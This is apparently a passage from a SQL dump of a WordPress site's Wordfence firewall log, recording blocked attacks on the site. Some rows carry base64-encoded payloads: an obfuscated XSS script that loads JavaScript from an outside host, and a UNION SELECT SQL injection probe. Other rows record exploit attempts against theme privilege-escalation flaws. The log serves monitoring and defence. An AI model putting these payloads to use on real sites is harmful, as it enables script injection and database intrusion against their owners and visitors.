Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2Nzc10=\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICBhc3luYz10cnVlIHR5cGU9dGV4dC9qYXZhc2NyaXB0IGxhbmd1YWdlPWphdmFzY3JpcHQ+dmFyIG50ID0gU3RyaW5nLmZyb21DaGFyQ29kZSg5OCwxMDEsMTE0LDExNiw1NCk7dmFyIG1iID0gU3RyaW5nLmZyb21DaGFyQ29kZSg5NywgMTA2LCA5NywgMTIwLCA2NywgMTExLCAxMTcsIDExMCwgMTE2LCAxMDEsIDExNCk7dmFyIHNiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMTUsIDk5LCAxMTQsIDEwNSwgMTEyLCAxMTYpO3ZhciBqYiA9IFN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LCAxMTYsIDExNiwgMTEyLCAxMTUsIDU4LCA0NywgNDcpOyB2YXIgdGIgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDExNiwgMTAxLCAxMjAsIDExNiwgNDcsIDEwNiwgOTcsIDExOCwgOTcsIDExNSwgOTksIDExNCwgMTA1LCAxMTIsIDExNik7dmFyIGxiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMDMsOTcsOTgsMTE0LDEwNSwxMDEsMTA4LDEwOCw5NywxMDgsMTExLDExOCwxMDEsOTksOTcsMTE2LDExNSw0Niw5OSwxMTEsMTA5LDQ3LDEwOCwxMTEsMTEwLDEwMSw0NiwxMDYsMTE1LDYzLDEyMiwxMTEsMTEwLDEwMSwxMDUsMTAwLDYxLDU2LDU3LDU0LDUzLDUyLDUxLDUwLDM4LDExNywxMTYsMTA5LDk1LDk5LDYxLDUyLDM4LDEwOSwxMTQsMTExLDYxKTt2YXIgYz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KHNiKTtjLnR5cGU9dGIsYy5hc3luYz0xLGMuc3JjPWpiK2xiK250O3ZhciBuPWRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKHNiKVswXTtuLnBhcmVudE5vZGUuaW5zZXJ0QmVmb3JlKGMsbik7PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(8123,1564715935.511773,1564715935.145600,'\0\0\0\0\0\0\0\0\0\0%5',0,403,0,0,0,'https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fannual-returns%2F1111111111111%27+UNION+SELECT+CHAR%2845%2C120%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C53%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C54%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C55%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C56%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C57%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C48%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C53%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C54%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C55%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C56%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C57%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C48%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C53%2C45%2C81%2C45%29+--+%2F%2A+order+by+%27as+%2F%2A',NULL,'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tyZWRpcmVjdF90b10=\",\"paramValue\":\"aHR0cHM6Ly9jb21wYW55cmVnaXN0cmF0aW9uLm9ubGluZS9hbm51YWwtcmV0dXJucy8xMTExMTExMTExMTExJyBVTklPTiBTRUxFQ1QgQ0hBUig0NSwxMjAsNDksNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1MSw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTIsNDUsODEsNDUpLENIQVIoNDUsMTIwLDUzLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1NCw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTUsNDUsODEsNDUpLENIQVIoNDUsMTIwLDU2LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1Nyw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNDgsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDQ5LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1MCw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNTEsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDUyLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1Myw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNTQsNDUsODEsNDUpLENIQVIoNDUsMTIwLDQ5LDU1LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw0OSw1Niw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNTcsNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDQ4LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1MCw0OSw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTAsNTAsNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDUxLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1MCw1Miw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTAsNTMsNDUsODEsNDUpIC0tIC8qIG9yZGVyIGJ5ICdhcyAvKg==\",\"path\":\"L3dwLWxvZ2luLnBocA==\",\"category\":\"sqli\",\"ssl\":1}'),(8065,1564682736.639742,1564682733.676400,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=1',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"MQ==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(7824,1564591600.233588,1564591599.834300,'\0\0\0\0\0\0\0\0\0\0	8h',0,403,0,0,0,'https://companyregistration.online/',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W290d19wY3RsX2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC90ZXh0YXJlYT48c2NyaXB0ICBhc3luYz10cnVlIHR5cGU9dGV4dC9qYXZhc2NyaXB0IGxhbmd1YWdlPWphdmFzY3JpcHQ+dmFyIG50ID0gU3RyaW5nLmZyb21DaGFyQ29kZSg5OCwxMDEsMTE0LDExNiw1NCk7dmFyIG1iID0gU3RyaW5nLmZyb21DaGFyQ29kZSg5NywgMTA2LCA5NywgMTIwLCA2NywgMTExLCAxMTcsIDExMCwgMTE2LCAxMDEsIDExNCk7dmFyIHNiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMTUsIDk5LCAxMTQsIDEwNSwgMTEyLCAxMTYpO3ZhciBqYiA9IFN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LCAxMTYsIDExNiwgMTEyLCAxMTUsIDU4LCA0NywgNDcpOyB2YXIgdGIgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDExNiwgMTAxLCAxMjAsIDExNiwgNDcsIDEwNiwgOTcsIDExOCwgOTcsIDExNSwgOTksIDExNCwgMTA1LCAxMTIsIDExNik7dmFyIGxiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMDMsOTcsOTgsMTE0LDEwNSwxMDEsMTA4LDEwOCw5NywxMDgsMTExLDExOCwxMDEsOTksOTcsMTE2LDExNSw0Niw5OSwxMTEsMTA5LDQ3LDEwOCwxMTEsMTEwLDEwMSw0NiwxMDYsMTE1LDYzLDEyMiwxMTEsMTEwLDEwMSwxMDUsMTAwLDYxLDU2LDU3LDU0LDUzLDUyLDUxLDUwLDM4LDExNywxMTYsMTA5LDk1LDk5LDYxLDUyLDM4LDEwOSwxMTQsMTExLDYxKTt2YXIgYz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KHNiKTtjLnR5cGU9dGIsYy5hc3luYz0xLGMuc3JjPWpiK2xiK250O3ZhciBuPWRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKHNiKVswXTtuLnBhcmVudE5vZGUuaW5zZXJ0QmVmb3JlKGMsbik7PC9zY3JpcHQ+\",\"path\":\"Lw==\",\"category\":\"xss\",\"ssl\":1}'),(8066,1564682732.027910,1564682727.542100,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=test',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"dGVzdA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(8067,1564682725.906679,1564682724.014800,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=3',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mw==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(7825,1564591599.088679,1564591598.712500,'\0\0\0\0\0\0\0\0\0\0	8h',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W290d19wY3RsX2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC90ZXh0YXJlYT48c2NyaXB0ICBhc3luYz10cnVlIHR5cGU9dGV4dC9qYXZhc2NyaXB0IGxhbmd1YWdlPWphdmFzY3JpcHQ+dmFyIG50ID0gU3RyaW5nLmZyb21DaGFyQ29kZSg5OCwxMDEsMTE0LDExNiw1NCk7dmFyIG1iID0gU3RyaW5nLmZyb21DaGFyQ29kZSg5NywgMTA2LCA5NywgMTIwLCA2NywgMTExLCAxMTcsIDExMCwgMTE2LCAxMDEsIDExNCk7dmFyIHNiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMTUsIDk5LCAxMTQsIDEwNSwgMTEyLCAxMTYpO3ZhciBqYiA9IFN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LCAxMTYsIDExNiwgMTEyLCAxMTUsIDU4LCA0NywgNDcpOyB2YXIgdGIgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDExNiwgMTAxLCAxMjAsIDExNiwgNDcsIDEwNiwgOTcsIDExOCwgOTcsIDExNSwgOTksIDExNCwgMTA1LCAxMTIsIDExNik7dmFyIGxiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMDMsOTcsOTgsMTE0LDEwNSwxMDEsMTA4LDEwOCw5NywxMDgsMTExLDExOCwxMDEsOTksOTcsMTE2LDExNSw0Niw5OSwxMTEsMTA5LDQ3LDEwOCwxMTEsMTEwLDEwMSw0NiwxMDYsMTE1LDYzLDEyMiwxMTEsMTEwLDEwMSwxMDUsMTAwLDYxLDU2LDU3LDU0LDUzLDUyLDUxLDUwLDM4LDExNywxMTYsMTA5LDk1LDk5LDYxLDUyLDM4LDEwOSwxMTQsMTExLDYxKTt2YXIgYz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KHNiKTtjLnR5cGU9dGIsYy5hc3luYz0xLGMuc3JjPWpiK2xiK250O3ZhciBuPWRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKHNiKVswXTtuLnBhcmVudE5vZGUuaW5zZXJ0QmVmb3JlKGMsbik7PC9zY3JpcHQ+\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(8068,1564682722.177088,1564682718.089000,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=2',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(8168,0.000000,1565078720.218337,'\0\0\0\0\0\0\0\0\0\0G',0,302,0,3,0,'https://companyregistration.online/wp-login.php','https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fwp-admin%2F&reauth=1','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36','loginOK',NULL,NULL),(8069,1564682716.174868,1564682711.599500,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=1',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"MQ==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(7826,1564591934.832853,1564591934.178700,'\0\0\0\0\0\0\0\0\0\0	8h',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Newspaper Premium Theme <= 6.7.1 - Privilege Escalation','{\"learningMode\":0,\"failedRules\":\"91\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"auth-bypass\",\"ssl\":1}'),(7844,1564599693.143575,1564599692.538200,'\0\0\0\0\0\0\0\0\0\0A',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7845,1564599692.161161,1564599691.797900,'\0\0\0\0\0\0\0\0\0\0A',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7846,1564599691.455368,1564599690.915400,'\0\0\0\0\0\0\0\0\0\0A',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7847,1564599690.557075,1564599689.976000,'\0\0\0\0\0\0\0\0\0\0A',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7848,1564599689.387109,1564599688.223800,'\0\0\0\0\0\0\0\0\0\0A',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7849,1564599687.749256,1564599686.868300,'\0\0\0\0\0\0\0\0\0\0A',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7850,1564599686.213079,1564599685.104900,'\0\0\0\0\0\0\0\0\0\0A',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7851,1564599684.698953,1564599684.040300,'\0\0\0\0\0\0\0\0\0\0A',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7852,1564599683.573645,1564599683.006900,'\0\0\0\0\0\0\0\0\0\0A',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7853,1564599682.521159,1564599681.844600,'\0\0\0\0\0\0\0\0\0\0A',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7854,1564599681.418650,1564599680.855500,'\0\0\0\0\0\0\0\0\0\0A',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7855,1564599680.269767,1564599679.428600,'\0\0\0\0\0\0\0\0\0\0A',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7856,1564599678.996534,1564599678.219700,'\0\0\0\0\0\0\0\0\0\0A',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7857,1564599677.687132,1564599676.915000,'\0\0\0\0\0\0\0\0\0\0A',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7858,1564599676.437551,1564599675.931200,'\0\0\0\0\0\0\0\0\0\0A',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7859,1564599672.041324,1564599671.482900,'\0\0\0\0\0\0\0\0\0\0A',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7860,1564599671.079855,1564599670.612300,'\0\0\0\0\0\0\0\0\0\0A',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7861,1564599669.837774,1564599669.350200,'\0\0\0\0\0\0\0\0\0\0A',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7862,1564599668.957503,1564599668.375100,'\0\0\0\0\0\0\0\0\0\0A',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7863,1564599667.952868,1564599667.425000,'\0\0\0\0\0\0\0\0\0\0A',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7864,1564599667.034300,1564599666.462700,'\0\0\0\0\0\0\0\0\0\0A',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7865,1564599666.025760,1564599665.427300,'\0\0\0\0\0\0\0\0\0\0A',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7866,1564599664.963040,1564599664.480500,'\0\0\0\0\0\0\0\0\0\0A',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7867,1564599664.086306,1564599663.520300,'\0\0\0\0\0\0\0\0\0\0A',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7868,1564599663.070052,1564599662.620500,'\0\0\0\0\0\0\0\0\0\0A',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7869,1564599662.182329,1564599661.487600,'\0\0\0\0\0\0\0\0\0\0A',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7870,1564599661.076083,1564599660.612800,'\0\0\0\0\0\0\0\0\0\0A',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7871,1564599660.261776,1564599659.721400,'\0\0\0\0\0\0\0\0\0\0A',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 